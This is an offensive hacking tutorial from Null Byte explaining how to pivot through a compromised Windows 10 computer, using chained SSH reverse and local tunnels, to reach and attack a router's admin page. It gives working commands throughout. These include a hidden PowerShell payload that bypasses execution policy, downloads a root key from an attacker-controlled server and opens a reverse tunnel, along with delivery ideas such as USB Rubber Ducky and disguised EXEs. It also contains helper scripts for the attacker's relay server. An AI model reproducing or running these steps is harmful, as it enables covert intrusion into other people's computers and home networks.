
Using SSH Tunnels to Forward Requests and Hack External Routers «Null Byte :: WonderHowTo



Without administrator privileges, installing additional software, or changing the Windows 10 firewall, an attacker can reach a router's administrative interface and run various exploits against it. It is accomplished by forwarding requests from Kali through a backdoored Windows computer to the router gateway using simple SSH tunnels.

The attack outlined here uses the SSH -R (remote) and -L (local) port-forwarding options to build encrypted connections to and from the attacker's server. The diagram below is a simplified representation of the attack.

  # Attack Topology

  [Kali/Hacker]
        |
       SSH
        |
  [Debian/Server]
        |
       SSH
        |                      +--> [Router/Target on 192.168.1.1:80]
  [Windows 10/Proxy] ----------+--> [Raspberry Pi on 192.168.1.2:8080]
                               +--> [Torrent Client on 192.168.1.3:8080]

The connections let the attacker forward requests through a virtual private server (Debian) and then through a compromised Windows 10 PC, ultimately reaching the router gateway. Other devices and ports on the network can be targeted through the Windows 10 computer in the same way, but we'll focus on the router. An attacker with access to the router settings can do all kinds of damage.

The PowerShell payload, executed on Windows 10, makes an outbound SSH connection to the attacker's server (Windows 10 has shipped an OpenSSH client, ssh.exe, since version 1803, so nothing has to be installed). That connection carries a remote forward: requests arriving at the server are sent back through the Windows 10 machine to the router gateway. To reach the forwarded port on the Debian VPS, the attacker also connects to the server, chaining it and Windows 10 as a double-hop relay.

Similar attacks can be performed with Tor and give broader access to devices and ports on the target network. But I wanted a forwarding method that needed no administrator rights, no third-party software, no open ports on Windows 10, and no firewall changes.

The environment could be set up with Kali Linux and Windows 10 on a shared Wi-Fi network; there the attacker would use the Windows 10 host's IP address to reach a service that filters or whitelists by IP. That is a specific and less practical case, so this demonstration uses a virtual private server, which lets the attacker hack the router remotely, via the two systems, from any network in the world.

Step 1: Configure the Debian Server

First, SSH into the virtual private server that will be used in the attack, as root. The server's IP address is shown as 11.22.33.44 for the rest of this tutorial.

Create a new SSH key pair with the ssh-keygen command below. When prompted for a passphrase, leave it blank and press Enter. The passphrase must be empty because the payload runs ssh non-interactively and could never answer a prompt.

By default, ssh-keygen proposes the name "id_rsa". Change it to an unguessable string such as "ab56ab49226ed8603e9ae41e242d8096" to thwart directory crawlers and scanners, since the key will be served over HTTP.

Warning: the file name "key" is used for the rest of this demonstration for simplicity, but it is bad practice. Anyone who can guess and download the "key" file has full root access to the Debian server.

  ~# ssh-keygen

  Generating public/private rsa key pair.
  Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/key
  Created directory '/root/.ssh'.
  Enter passphrase (empty for no passphrase):
  Enter same passphrase again:
  Your identification has been saved in /root/.ssh/key.
  Your public key has been saved in /root/.ssh/key.pub.
  The key fingerprint is:
  SHA256:5M9KVJVlW2o2er4MSaW0+5yyFhqhKm51kAfrt/fEnbA root@debian9
  The key's randomart image is:
  +---[RSA 2048]----+
  |     .oo.        |
  |    . ... +      |
  |   +. . . B      |
  |  + o .... B.    |
  | . oS. . *.      |
  |  o. + o.o.O.    |
  | . + .. ooE. +   |
  |  o .... o.o = o |
  |   o .. .. ooo * |
  +----[SHA256]-----+

Then change to the ~/.ssh directory.

  ~# cd ~/.ssh

List the files in the directory; there should be a public (.pub) and a private key.

  ~/.ssh# ls -la

  -rw------- 1 root root 1675 Mar 24 05:26 key
  -rw-r--r-- 1 root root  391 Mar 24 05:26 key.pub

Copy the public key into a file named "authorized_keys". Any SSH client holding the private key (i.e. the Windows 10 target) can then authenticate to the server.

  ~/.ssh# cp key.pub authorized_keys

Edit "sshd_config" to disable password authentication. After the change, only clients holding the private key can authenticate. This matters because the payload runs ssh without a terminal: it must authenticate with the key alone and never fall through to a password prompt, and the exposed server should not accept password guesses either.

  ~/.ssh# nano /etc/ssh/sshd_config

Set the "PasswordAuthentication" option to "no", uncommenting the line if necessary. Save and exit nano with Ctrl+X, then Y, then Enter.

Now restart the SSH service with systemctl.

  ~/.ssh# systemctl restart ssh

In the .ssh/ directory, create an empty "index.html" file so that the HTTP server started next serves a blank page instead of listing the directory contents.

  ~/.ssh# touch index.html

Make the key available over the internet with the screen and python3 commands below. Screen keeps the Python HTTP server running long after the SSH session ends.

  ~/.ssh# screen python3 -m http.server 80

  Serving HTTP on 0.0.0.0 port 80 ...

To detach from the screen session without stopping the Python server, press Ctrl-A and then D. Then close the SSH session.
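The server-side configuration of this step as one idempotent script, added here as an example; it is not code from the original article, and the function names are mine. It assumes GNU sed (as on Debian) and, for the "restrict" option, an OpenSSH server of 7.2 or later. The authorized_keys entry it writes is a tighter alternative to the plain cp above: "restrict" switches off pty, agent and X11 forwarding, user rc files and port forwarding, and "port-forwarding" re-enables only the tunnels the attack needs (-R from Windows, -L from Kali), so the served key no longer hands out a root shell.

```shell
#!/bin/sh
# Added example, not code from the original article.
# Assumes GNU sed (Debian) and, for "restrict", OpenSSH 7.2+ on the server.

# set_sshd_option FILE KEY VALUE
# Rewrite every "KEY ..." line, commented out or not, to "KEY VALUE", or append
# the directive when FILE has none. Running it twice changes nothing.
# Caveat: it does not understand Match blocks; a KEY inside one is rewritten too.
set_sshd_option() {
    file=$1
    key=$2
    value=$3
    if grep -Eq "^[[:space:]]*#?[[:space:]]*$key([[:space:]]|$)" "$file"; then
        sed -i -E "s|^[[:space:]]*#?[[:space:]]*$key([[:space:]].*)?$|$key $value|" "$file"
    else
        printf '%s %s\n' "$key" "$value" >> "$file"
    fi
}

# get_sshd_option FILE KEY
# Print the value of the first active (uncommented) KEY directive, which is the
# one sshd honours; prints nothing when KEY is not set.
get_sshd_option() {
    awk -v k="$2" '$1 == k { print $2; exit }' "$1"
}

# restricted_key_line PUBFILE
# authorized_keys entry for the forwarding key: "restrict" disables pty,
# agent/X11 forwarding, user rc and port forwarding; "port-forwarding" then
# re-enables just the tunnels (-R on Windows, -N -L on Kali).
restricted_key_line() {
    printf 'restrict,port-forwarding %s\n' "$(cat "$1")"
}

# harden_server SSHD_CONFIG PUBFILE AUTHORIZED_KEYS
# The whole of Step 1's server-side configuration in one call.
harden_server() {
    set_sshd_option "$1" PasswordAuthentication no
    set_sshd_option "$1" GatewayPorts no      # keep -R listeners on loopback only
    restricted_key_line "$2" > "$3"
    chmod 600 "$3"
}

# Usage on the VPS, then validate the file and restart the daemon:
#   harden_server /etc/ssh/sshd_config /root/.ssh/key.pub /root/.ssh/authorized_keys
#   sshd -t && systemctl restart ssh
```

With the restricted entry, the login test in Step 2 should be run as `ssh -N -i ~/.ssh/key root@11.22.33.44` (no shell is needed, and pty allocation is refused); the -R and -L forwards used later still work unchanged. Run `sshd -t` before restarting so a typo in sshd_config cannot lock you out of the VPS.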

Step 2: Test the SSH service

A few checks confirm that the SSH server is configured correctly.

Open Firefox on the local Kali machine and navigate to the server's IP address or domain name. The server shows a blank page because of the empty index.html created in the previous step. Download /key by entering it in the URL bar.

Being able to download the key means that Invoke-WebRequest, run by PowerShell on the target Windows computer, will be able to fetch it too.

Then open a terminal and copy the key into Kali's ~/.ssh/ directory.

  ~# cp ~/Downloads/key ~/.ssh/

The SSH client is particular about the permissions of the key file and refuses a private key that is readable by other users. Fix them with chmod.

  ~# chmod 0600 ~/.ssh/key

Finally, test the key by authenticating from Kali to the Debian server. If the server asks for a password or refuses the key, something has gone wrong; Kali should get a shell without any prompt.

  ~# ssh -o StrictHostKeyChecking=no -i ~/.ssh/key root@11.22.33.44

  Warning: Permanently added '[11.22.33.44]:22,[XX.XXX.XXX.XX]:22' (ECDSA) to the list of known hosts.
  Linux debian9 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2020-03-24) x86_64

  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  permitted by applicable law.

  root@debian9:~#

Step 3: Run the payload

The PowerShell payload can be run against Windows 10 in several ways. It is useful during post-exploitation, where remote access to the computer has already been established. Mousejack and USB Rubber Ducky payloads are also very effective, and the command can be converted into an executable (EXE) and sent to the target.

  C:\> powershell -ep bypass /w 1 /C iwr 11.22.33.44/key -OutFile $env:temp\key; ssh -N -i $env:temp\key -R 9999:192.168.1.1:80 -o StrictHostKeyChecking=no root@11.22.33.44 -p 22

PowerShell first calls Invoke-WebRequest (iwr) to download /key from the attacker's server into the temp folder. It then runs ssh with -R 9999:192.168.1.1:80, which asks the server to listen on port 9999 and send every connection made to that port back through the tunnel, where the Windows computer forwards it to the router at 192.168.1.1:80. The -N flag tells ssh not to run a remote command; the session exists only to carry the forward, and the hidden window (/w 1) keeps it out of sight.

Step 4: Configuring Kali to Access the Router Gateway

After running the payload, use netstat on the Debian server to confirm that port 9999 is listening.

  ~# netstat -lptn

  Active Internet connections (only servers)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1220/sshd
  tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      9999/sshd: root@pts
  tcp6       0      0 :::22                   :::*                    LISTEN      1220/sshd
  tcp6       0      0 ::1:9999

Connections to port 9999 are now forwarded to the router (192.168.1.1:80). The catch is that port 9999 is bound only to Debian's loopback addresses (127.0.0.1 and ::1), because sshd's GatewayPorts option defaults to "no", so it cannot be reached from external IP addresses such as Kali's. One solution is to connect from Kali to the Debian server with the -L option.

  ~# ssh -N -L 8888:127.0.0.1:9999 -i ~/.ssh/key root@11.22.33.44

On Kali, connections to local port 8888 are forwarded to port 9999 on the Debian server, from where they immediately continue through Windows 10 to the router gateway. Debian and Windows 10 work together as relays, letting the attacker reach a router on the other side of the world.

Verify it by opening Firefox in Kali and navigating to http://127.0.0.1:8888.

Router gateway accessible through Windows 10.
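The loopback check from this step as a script, added here as an example; it is not code from the original article, and listen_addrs, loopback_only and explain are my names. It parses `netstat -lptn` output as shown above, and also `ss -ltnp` output (which newer Debian releases ship in place of netstat), reports where a port is bound, and says whether the -R listener still needs the -L hop or, if GatewayPorts were switched on, is already exposed to everyone who can reach the VPS. The sample table is constructed to match the page's netstat output.

```shell
#!/bin/sh
# Added example, not code from the original article. Assumes POSIX sh and awk.
# Reads a listener table (netstat -lptn as on the page, or ss -ltnp) from stdin
# and reports where a port is bound, so you can tell whether the -R listener
# needs a second -L hop to be reached.

# Constructed sample, modelled on the page's netstat output after the payload ran.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1220/sshd
tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      1345/sshd: root@pts
tcp6       0      0 :::22                   :::*                    LISTEN      1220/sshd
tcp6       0      0 ::1:9999                :::*                    LISTEN      1345/sshd: root@pts'

# listen_addrs PORT   (listener table on stdin)
# Print the local bind address of every TCP listener on PORT, one per line.
# The first field ending in ":PORT" is the local address in both netstat and ss.
listen_addrs() {
    awk -v p="$1" '
        /LISTEN/ {
            for (i = 1; i <= NF; i++) {
                n = split($i, part, ":")
                if (n < 2 || part[n] != p) continue
                addr = substr($i, 1, length($i) - length(p) - 1)
                gsub(/[][]/, "", addr)      # ss prints IPv6 as [::1]:9999
                print addr
                break
            }
        }'
}

# loopback_only PORT   (listener table on stdin)
# 0: every listener on PORT is on 127.0.0.1/::1 (reachable only from the box)
# 1: at least one listener is on another address (reachable from outside)
# 2: nothing listens on PORT
loopback_only() {
    addrs=$(listen_addrs "$1")
    [ -n "$addrs" ] || return 2
    for a in $addrs; do
        case "$a" in
            127.*|::1) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# explain PORT   (listener table on stdin)
# One-line verdict on what the listener state means for the attack.
explain() {
    rc=0
    loopback_only "$1" || rc=$?
    case $rc in
        0) echo "port $1 is loopback-only: reach it from Kali with ssh -N -L 8888:127.0.0.1:$1 ..." ;;
        1) echo "port $1 listens on a non-loopback address: anyone who can reach the VPS can use the tunnel" ;;
        *) echo "nothing listens on port $1: the payload has not connected" ;;
    esac
}

printf '%s\n' "$SAMPLE_NETSTAT" | explain 9999
```

On the live server, run `netstat -lptn | explain 9999` (or `ss -ltnp | explain 9999`) after the payload fires. A non-loopback result means the -R listener was bound with GatewayPorts enabled and the router's admin page is now one unauthenticated TCP connection away for anyone on the internet, which is why the extra -L hop is the safer design.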

Final Thoughts …

The attack is somewhat involved because it uses two layers of port forwarding. Still, it shows how an attacker can reach other devices and ports on a target network remotely without special privileges or additional software. If there are simpler methods to achieve the same goal, leave a comment below; I would love to hear about them.

If you enjoyed this article, follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. For questions and concerns, leave a comment or message me on Twitter.

Cover photo by Kevin Horvat / Unsplash; Screenshots and GIF by tokyoneon / Null Byte



